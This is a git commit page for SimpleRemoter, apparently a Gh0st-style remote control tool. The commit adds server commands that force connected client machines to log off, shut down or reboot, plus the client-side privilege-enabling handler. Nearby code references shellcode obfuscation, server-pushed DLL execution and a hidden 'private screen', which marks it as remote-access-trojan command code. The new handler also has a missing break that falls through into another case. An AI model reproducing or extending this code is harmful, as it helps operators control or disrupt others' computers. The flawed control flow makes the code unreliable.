admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Feature: Add machine logout, shutdown and reboot cmd

Browse Source
This commit is contained in:
yuanyuanxiang
2025-10-19 19:52:12 +08:00
parent d193e2cfe5
commit 25cf3ea990
9 changed files with 127 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

51
client/KernelManager.cpp
View File

@@ -365,6 +365,34 @@ BOOL IsRunningAsAdmin()
return isAdmin; return isAdmin;
} }
bool EnableShutdownPrivilege() {
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
// 打开当前进程的令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
// 获取关机权限的 LUID
if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return false;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// 启用关机权限
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
CloseHandle(hToken);
return false;
}
CloseHandle(hToken);
return true;
}
VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
{ {
bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT; bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT;
@@ -377,6 +405,29 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
std::string publicIP = m_ClientObject->GetClientIP(); std::string publicIP = m_ClientObject->GetClientIP();
switch (szBuffer[0]) { switch (szBuffer[0]) {
case TOKEN_MACHINE_MANAGE:
if (ulLength <= 1 || !EnableShutdownPrivilege()) break;
#ifdef _DEBUG
Mprintf("收到机器管理命令: %d, %d\n", szBuffer[0], szBuffer[1]);
break;
#endif
switch (szBuffer[1])
{
case MACHINE_LOGOUT: {
ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
break;
}
case MACHINE_SHUTDOWN: {
ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
break;
}
case MACHINE_REBOOT: {
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
break;
}
default:
break;
}
case CMD_RUNASADMIN: { case CMD_RUNASADMIN: {
char curFile[_MAX_PATH] = {}; char curFile[_MAX_PATH] = {};
GetModuleFileName(NULL, curFile, MAX_PATH); GetModuleFileName(NULL, curFile, MAX_PATH);

7
common/commands.h
View File

@@ -191,6 +191,7 @@ enum {
TOKEN_CHAT_START = 62, // Զ<>̽<EFBFBD≯ TOKEN_CHAT_START = 62, // Զ<>̽<EFBFBD≯
TOKEN_UNINSTALL = 63, // ж<><D0B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD> TOKEN_UNINSTALL = 63, // ж<><D0B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
TOKEN_PRIVATESCREEN = 64, // <20><>˽<EFBFBD><CBBD>Ļ TOKEN_PRIVATESCREEN = 64, // <20><>˽<EFBFBD><CBBD>Ļ
TOKEN_MACHINE_MANAGE = 65, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// <20><><EFBFBD><EFBFBD><EFBFBD>˷<EFBFBD><CBB7><EFBFBD><EFBFBD>ı<EFBFBD>ʶ // <20><><EFBFBD><EFBFBD><EFBFBD>˷<EFBFBD><CBB7><EFBFBD><EFBFBD>ı<EFBFBD>ʶ
TOKEN_AUTH = 100, // Ҫ<><D2AA><EFBFBD><EFBFBD>֤ TOKEN_AUTH = 100, // Ҫ<><D2AA><EFBFBD><EFBFBD>֤
@@ -264,6 +265,12 @@ enum {
CMD_EXECUTE_DLL = 240, // ִ<>д<EFBFBD><D0B4><EFBFBD> CMD_EXECUTE_DLL = 240, // ִ<>д<EFBFBD><D0B4><EFBFBD>
}; };
enum MachineCommand {
MACHINE_LOGOUT,
MACHINE_SHUTDOWN,
MACHINE_REBOOT,
};
enum ProxyManager { enum ProxyManager {
TOKEN_PROXY_CONNECT_RESULT, TOKEN_PROXY_CONNECT_RESULT,
TOKEN_PROXY_BIND_RESULT, TOKEN_PROXY_BIND_RESULT,

BIN
server/2015Remote/2015Remote.rc
View File

Binary file not shown.

59
server/2015Remote/2015RemoteDlg.cpp
View File

@@ -50,6 +50,7 @@
#define UM_ICONNOTIFY WM_USER+100 #define UM_ICONNOTIFY WM_USER+100
#define TIMER_CHECK 1 #define TIMER_CHECK 1
#define TIMER_CLOSEWND 2 #define TIMER_CLOSEWND 2
#define TODO_NOTICE MessageBoxA("This feature has not been implemented!\nPlease contact: 962914132@qq.com", "提示", MB_ICONINFORMATION);
typedef struct { typedef struct {
const char* szTitle; //列表的名称 const char* szTitle; //列表的名称
@@ -356,6 +357,7 @@ CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::I
m_bmOnline[14].LoadBitmap(IDB_BITMAP_ADMINRUN); m_bmOnline[14].LoadBitmap(IDB_BITMAP_ADMINRUN);
m_bmOnline[15].LoadBitmap(IDB_BITMAP_UNINSTALL); m_bmOnline[15].LoadBitmap(IDB_BITMAP_UNINSTALL);
m_bmOnline[16].LoadBitmap(IDB_BITMAP_PDESKTOP); m_bmOnline[16].LoadBitmap(IDB_BITMAP_PDESKTOP);
m_bmOnline[17].LoadBitmap(IDB_BITMAP_REGROUP);
for (int i = 0; i < PAYLOAD_MAXTYPE; i++) { for (int i = 0; i < PAYLOAD_MAXTYPE; i++) {
m_ServerDLL[i] = nullptr; m_ServerDLL[i] = nullptr;
@@ -486,6 +488,12 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
ON_COMMAND(ID_ONLINE_PRIVATE_SCREEN, &CMy2015RemoteDlg::OnOnlinePrivateScreen) ON_COMMAND(ID_ONLINE_PRIVATE_SCREEN, &CMy2015RemoteDlg::OnOnlinePrivateScreen)
ON_NOTIFY(TCN_SELCHANGE, IDC_GROUP_TAB, &CMy2015RemoteDlg::OnSelchangeGroupTab) ON_NOTIFY(TCN_SELCHANGE, IDC_GROUP_TAB, &CMy2015RemoteDlg::OnSelchangeGroupTab)
ON_COMMAND(ID_OBFS_SHELLCODE, &CMy2015RemoteDlg::OnObfsShellcode) ON_COMMAND(ID_OBFS_SHELLCODE, &CMy2015RemoteDlg::OnObfsShellcode)
ON_COMMAND(ID_ONLINE_REGROUP, &CMy2015RemoteDlg::OnOnlineRegroup)
ON_COMMAND(ID_MACHINE_SHUTDOWN, &CMy2015RemoteDlg::OnMachineShutdown)
ON_COMMAND(ID_MACHINE_REBOOT, &CMy2015RemoteDlg::OnMachineReboot)
ON_COMMAND(ID_EXECUTE_DOWNLOAD, &CMy2015RemoteDlg::OnExecuteDownload)
ON_COMMAND(ID_EXECUTE_UPLOAD, &CMy2015RemoteDlg::OnExecuteUpload)
ON_COMMAND(ID_MACHINE_LOGOUT, &CMy2015RemoteDlg::OnMachineLogout)
END_MESSAGE_MAP() END_MESSAGE_MAP()
@@ -1477,6 +1485,7 @@ void CMy2015RemoteDlg::OnNMRClickOnline(NMHDR *pNMHDR, LRESULT *pResult)
Menu.SetMenuItemBitmaps(ID_ONLINE_RUN_AS_ADMIN, MF_BYCOMMAND, &m_bmOnline[14], &m_bmOnline[14]); Menu.SetMenuItemBitmaps(ID_ONLINE_RUN_AS_ADMIN, MF_BYCOMMAND, &m_bmOnline[14], &m_bmOnline[14]);
Menu.SetMenuItemBitmaps(ID_ONLINE_UNINSTALL, MF_BYCOMMAND, &m_bmOnline[15], &m_bmOnline[15]); Menu.SetMenuItemBitmaps(ID_ONLINE_UNINSTALL, MF_BYCOMMAND, &m_bmOnline[15], &m_bmOnline[15]);
Menu.SetMenuItemBitmaps(ID_ONLINE_PRIVATE_SCREEN, MF_BYCOMMAND, &m_bmOnline[16], &m_bmOnline[16]); Menu.SetMenuItemBitmaps(ID_ONLINE_PRIVATE_SCREEN, MF_BYCOMMAND, &m_bmOnline[16], &m_bmOnline[16]);
Menu.SetMenuItemBitmaps(ID_ONLINE_REGROUP, MF_BYCOMMAND, &m_bmOnline[17], &m_bmOnline[17]);
std::string masterHash(GetMasterHash()); std::string masterHash(GetMasterHash());
if (GetPwdHash() != masterHash || m_superPass.empty()) { if (GetPwdHash() != masterHash || m_superPass.empty()) {
@@ -3369,3 +3378,53 @@ void CMy2015RemoteDlg::OnSelchangeGroupTab(NMHDR* pNMHDR, LRESULT* pResult)
*pResult = 0; *pResult = 0;
} }
void CMy2015RemoteDlg::OnOnlineRegroup()
{
TODO_NOTICE;
}
void CMy2015RemoteDlg::MachineManage(MachineCommand type) {
if (MessageBoxA("此操作需客户端具有管理员权限,确定继续吗? ", "提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
EnterCriticalSection(&m_cs);
POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
while (Pos) {
int iItem = m_CList_Online.GetNextSelectedItem(Pos);
context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
BYTE token[32] = { TOKEN_MACHINE_MANAGE, type };
ContextObject->Send2Client(token, sizeof(token));
}
LeaveCriticalSection(&m_cs);
}
}
void CMy2015RemoteDlg::OnMachineLogout()
{
MachineManage(MACHINE_LOGOUT);
}
void CMy2015RemoteDlg::OnMachineShutdown()
{
MachineManage(MACHINE_SHUTDOWN);
}
void CMy2015RemoteDlg::OnMachineReboot()
{
MachineManage(MACHINE_REBOOT);
}
void CMy2015RemoteDlg::OnExecuteDownload()
{
TODO_NOTICE;
}
void CMy2015RemoteDlg::OnExecuteUpload()
{
TODO_NOTICE;
}

9
server/2015Remote/2015RemoteDlg.h
View File

@@ -228,7 +228,7 @@ public:
CRITICAL_SECTION m_cs; CRITICAL_SECTION m_cs;
BOOL isClosed; BOOL isClosed;
CMenu m_MainMenu; CMenu m_MainMenu;
CBitmap m_bmOnline[17]; CBitmap m_bmOnline[18];
uint64_t m_superID; uint64_t m_superID;
enum { enum {
STATUS_UNKNOWN = -1, STATUS_UNKNOWN = -1,
@@ -323,4 +323,11 @@ public:
CTabCtrl m_GroupTab; CTabCtrl m_GroupTab;
afx_msg void OnSelchangeGroupTab(NMHDR* pNMHDR, LRESULT* pResult); afx_msg void OnSelchangeGroupTab(NMHDR* pNMHDR, LRESULT* pResult);
afx_msg void OnObfsShellcode(); afx_msg void OnObfsShellcode();
afx_msg void OnOnlineRegroup();
afx_msg void OnMachineShutdown();
afx_msg void OnMachineReboot();
afx_msg void OnExecuteDownload();
afx_msg void OnExecuteUpload();
afx_msg void OnMachineLogout();
void MachineManage(MachineCommand type);
}; };

1
server/2015Remote/2015Remote_vs2015.vcxproj
View File

@@ -405,6 +405,7 @@
<Image Include="res\Bitmap\AssignTo.bmp" /> <Image Include="res\Bitmap\AssignTo.bmp" />
<Image Include="res\Bitmap\authorize.bmp" /> <Image Include="res\Bitmap\authorize.bmp" />
<Image Include="res\Bitmap\DxgiDesktop.bmp" /> <Image Include="res\Bitmap\DxgiDesktop.bmp" />
<Image Include="res\Bitmap\EditGroup.bmp" />
<Image Include="res\Bitmap\GrayDesktop.bmp" /> <Image Include="res\Bitmap\GrayDesktop.bmp" />
<Image Include="res\Bitmap\note.bmp" /> <Image Include="res\Bitmap\note.bmp" />
<Image Include="res\Bitmap\PrivateScreen.bmp" /> <Image Include="res\Bitmap\PrivateScreen.bmp" />

1
server/2015Remote/2015Remote_vs2015.vcxproj.filters
View File

@@ -165,6 +165,7 @@
<Image Include="res\Bitmap\AdminRun.bmp" /> <Image Include="res\Bitmap\AdminRun.bmp" />
<Image Include="res\Bitmap\remove.bmp" /> <Image Include="res\Bitmap\remove.bmp" />
<Image Include="res\Bitmap\PrivateScreen.bmp" /> <Image Include="res\Bitmap\PrivateScreen.bmp" />
<Image Include="res\Bitmap\EditGroup.bmp" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<None Include="..\..\Release\ghost.exe" /> <None Include="..\..\Release\ghost.exe" />

BIN
server/2015Remote/res/Bitmap/EditGroup.bmp Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 822 B

BIN
server/2015Remote/resource.h
View File

Binary file not shown.